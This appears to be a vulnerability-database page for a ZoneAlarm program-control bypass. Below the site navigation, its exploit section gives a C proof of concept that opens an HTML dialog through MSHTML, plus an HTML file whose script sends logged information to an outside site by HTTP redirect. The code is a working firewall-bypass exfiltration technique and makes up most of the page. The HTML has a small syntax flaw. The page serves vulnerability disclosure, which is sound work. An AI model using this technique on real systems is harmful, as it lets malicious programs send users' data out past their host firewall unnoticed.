• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Zone Labs Zone Alarm Advance Program Control Bypass Weakness

The following proof of concept is available:
<<< osfwbypass-demo.c >>>

BOOL LoadHtmlDialog(void)
{
HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));

if (hinstMSHTML)
{
SHOWHTMLDIALOGFN* pfnShowHTMLDialog;

// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
TEXT("ShowHTMLDialog"));

if (pfnShowHTMLDialog)
{
IMoniker *pURLMoniker;

// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);

if (pURLMoniker)
{
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
pURLMoniker->Release();
}

SysFreeString(bstrURL);
}

FreeLibrary(hinstMSHTML);
}

Return True;
}

<<< +++ >>>


<<< modal-dialog.htm >>>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<title>Redirection Dialog</title>

<script language="JavaScript">

<!-- Here goes the information logged by the malicious program which will
be sent to the evil site via http request -->
var sTargetURL =
"http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your
Information Here]
window.location.href = sTargetURL;
window.close;
</script>

</head>
</html>
<<< +++ >>>